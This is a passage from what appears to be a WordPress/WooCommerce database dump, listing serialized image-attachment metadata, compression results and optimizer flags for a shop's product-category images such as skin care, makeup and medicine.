:300;s:5:\"ratio\";d:0.37919999999999998;}s:3:\"end\";i:1594122773;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:23969;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:9749;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.40670000000000001;}s:3:\"end\";i:1594122769;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:94807;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:35789;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.3775;}s:3:\"end\";i:1594122777;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:11496;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5081;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.442;}s:3:\"end\";i:1594122779;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:49675;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:18438;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.37119999999999997;}s:3:\"end\";i:1591599323;}}'),(214,215,'siteground_optimizer_optimization_attempts','1'),(215,215,'siteground_optimizer_is_optimized','1'),(216,215,'siteground_optimizer_webp_conversion_attempts','1'),(217,215,'siteground_optimizer_webp_conversion_failed','1'),(219,217,'_wp_attached_file','2020/06/Sugar-salt.png'),(220,217,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2020/06/Sugar-salt.png\";s:8:\"filesize\";i:47207;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:22:\"Sugar-salt-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:38420;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:22:\"Sugar-salt-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5274;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:20:\"Sugar-salt-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1851;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(221,217,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:139588;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:47207;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.3382;}s:3:\"end\";i:1591599296;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:35944;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14888;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.41420000000000001;}s:3:\"end\";i:1594122768;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:10478;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5000;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.47720000000000001;}s:3:\"end\";i:1594122765;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:39645;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:16328;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.41189999999999999;}s:3:\"end\";i:1594122771;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:5270;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2875;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.54549999999999998;}s:3:\"end\";i:1594122774;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:21460;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8786;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.40939999999999999;}s:3:\"end\";i:1591599305;}}'),(222,217,'siteground_optimizer_optimization_attempts','1'),(223,217,'siteground_optimizer_is_optimized','1'),(224,217,'siteground_optimizer_webp_conversion_attempts','1'),(225,217,'siteground_optimizer_webp_conversion_failed','1'),(227,219,'_wp_attached_file','2020/06/bath-handwash.png'),(228,219,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:25:\"2020/06/bath-handwash.png\";s:8:\"filesize\";i:47615;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:25:\"bath-handwash-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:54846;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:25:\"bath-handwash-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7203;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:23:\"bath-handwash-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(229,219,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:190950;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:47615;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.24940000000000001;}s:3:\"end\";i:1591599295;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:49789;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15073;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.30270000000000002;}s:3:\"end\";i:1594122763;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:14293;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5220;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36520000000000002;}s:3:\"end\";i:1594122760;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:55673;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:16398;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.29449999999999998;}s:3:\"end\";i:1594122766;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7020;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3112;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.44330000000000003;}s:3:\"end\";i:1594122769;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:28798;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8877;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.30830000000000002;}s:3:\"end\";i:1591599305;}}'),(230,219,'siteground_optimizer_optimization_attempts','1'),(231,219,'siteground_optimizer_is_optimized','1'),(232,219,'siteground_optimizer_webp_conversion_attempts','1'),(233,219,'siteground_optimizer_webp_conversion_failed','1'),(235,221,'_wp_attached_file','2020/06/Fragrances-Deos.png'),(236,221,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:27:\"2020/06/Fragrances-Deos.png\";s:8:\"filesize\";i:38852;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:27:\"Fragrances-Deos-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:51248;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:27:\"Fragrances-Deos-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:7552;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:25:\"Fragrances-Deos-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2629;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(237,221,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:161976;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:38852;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2399;}s:3:\"end\";i:1591599295;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:43014;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13265;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.30840000000000001;}s:3:\"end\";i:1594122762;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:13870;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5121;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.36919999999999997;}s:3:\"end\";i:1594122759;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:50464;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14325;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.28389999999999999;}s:3:\"end\";i:1594122765;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7080;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3134;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.44269999999999998;}s:3:\"end\";i:1594122768;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:27310;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8433;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.30880000000000002;}s:3:\"end\";i:1591599304;}}'),(238,221,'siteground_optimizer_optimization_attempts','1'),(239,221,'siteground_optimizer_is_optimized','1'),(240,221,'siteground_optimizer_webp_conversion_attempts','1'),(241,221,'siteground_optimizer_webp_conversion_failed','1'),(243,223,'_wp_attached_file','2020/06/Hair-Care.png'),(244,223,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2020/06/Hair-Care.png\";s:8:\"filesize\";i:46249;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"Hair-Care-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:47690;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"Hair-Care-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6722;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"Hair-Care-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(245,223,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:165639;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:46249;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.2792;}s:3:\"end\";i:1591599294;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:43131;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14412;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.33410000000000001;}s:3:\"end\";i:1594122761;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:12795;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5042;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.39410000000000001;}s:3:\"end\";i:1594122758;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:47992;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15740;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.32800000000000001;}s:3:\"end\";i:1594122764;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6500;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3066;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.47170000000000001;}s:3:\"end\";i:1594122767;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:25608;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8773;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.34260000000000002;}s:3:\"end\";i:1591599302;}}'),(246,223,'siteground_optimizer_optimization_attempts','1'),(247,223,'siteground_optimizer_is_optimized','1'),(248,223,'siteground_optimizer_webp_conversion_attempts','1'),(249,223,'siteground_optimizer_webp_conversion_failed','1'),(251,225,'_wp_attached_file','2020/06/skin-care.png'),(252,225,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:21:\"2020/06/skin-care.png\";s:8:\"filesize\";i:41163;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:21:\"skin-care-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41696;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:21:\"skin-care-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:6318;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:19:\"skin-care-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2236;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(253,225,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:121770;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:41163;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.33800000000000002;}s:3:\"end\";i:1591599293;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:38007;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:13912;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.36599999999999999;}s:3:\"end\";i:1594122760;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:11935;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5161;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.43240000000000001;}s:3:\"end\";i:1594122757;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:42246;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:15116;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.35780000000000001;}s:3:\"end\";i:1594122763;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:6240;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3224;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.51670000000000005;}s:3:\"end\";i:1594122766;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:22735;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8393;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.36919999999999997;}s:3:\"end\";i:1591599301;}}'),(254,225,'siteground_optimizer_optimization_attempts','1'),(255,225,'siteground_optimizer_is_optimized','1'),(256,225,'siteground_optimizer_webp_conversion_attempts','1'),(257,225,'siteground_optimizer_webp_conversion_failed','1'),(259,227,'_wp_attached_file','2020/06/makeup.png'),(260,227,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:18:\"2020/06/makeup.png\";s:8:\"filesize\";i:37357;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:18:\"makeup-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55092;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"makeup-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:9761;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"makeup-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3774;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(261,227,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:188076;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:37357;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.1986;}s:3:\"end\";i:1591599277;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:40794;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:12896;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.31609999999999999;}s:3:\"end\";i:1594122756;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:14211;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:5051;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.35539999999999999;}s:3:\"end\";i:1594122753;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:52839;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:14186;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.26850000000000002;}s:3:\"end\";i:1594122759;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:7492;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3277;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.43740000000000001;}s:3:\"end\";i:1594122762;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:29542;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:8309;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.28129999999999999;}s:3:\"end\";i:1591599286;}}'),(262,227,'siteground_optimizer_optimization_attempts','1'),(263,227,'siteground_optimizer_is_optimized','1'),(264,227,'siteground_optimizer_webp_conversion_attempts','1'),(265,227,'siteground_optimizer_webp_conversion_failed','1'),(267,229,'_wp_attached_file','2020/06/medicine.png'),(268,229,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:20:\"2020/06/medicine.png\";s:8:\"filesize\";i:20074;s:5:\"sizes\";a:3:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"medicine-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:31207;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"medicine-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4896;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:18:\"medicine-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1743;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(269,229,'tiny_compress_images','a:8:{i:0;a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:104037;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:20074;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:5:\"ratio\";d:0.193;}s:3:\"end\";i:1591599276;}s:6:\"medium\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:25227;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7413;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:5:\"ratio\";d:0.29389999999999999;}s:3:\"end\";i:1594122751;}s:9:\"thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:8757;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:3142;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:5:\"ratio\";d:0.35880000000000001;}s:3:\"end\";i:1594122748;}s:21:\"woocommerce_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:31341;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:7748;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:5:\"ratio\";d:0.2472;}s:3:\"end\";i:1594122754;}s:29:\"woocommerce_gallery_thumbnail\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:4617;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:2206;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:5:\"ratio\";d:0.4778;}s:3:\"end\";i:1594122757;}s:12:\"shop_catalog\";a:0:{}s:14:\"shop_thumbnail\";a:0:{}s:21:\"yith-woocompare-image\";a:3:{s:5:\"input\";a:2:{s:4:\"size\";i:17042;s:4:\"type\";s:9:\"image/png\";}s:6:\"output\";a:5:{s:4:\"size\";i:4748;s:4:\"type\";s:9:\"image/png\";s:5:\"width\";i:220;s:6:\"height\";i:154;s:5:\"ratio\";d:0.27860000000000001;}s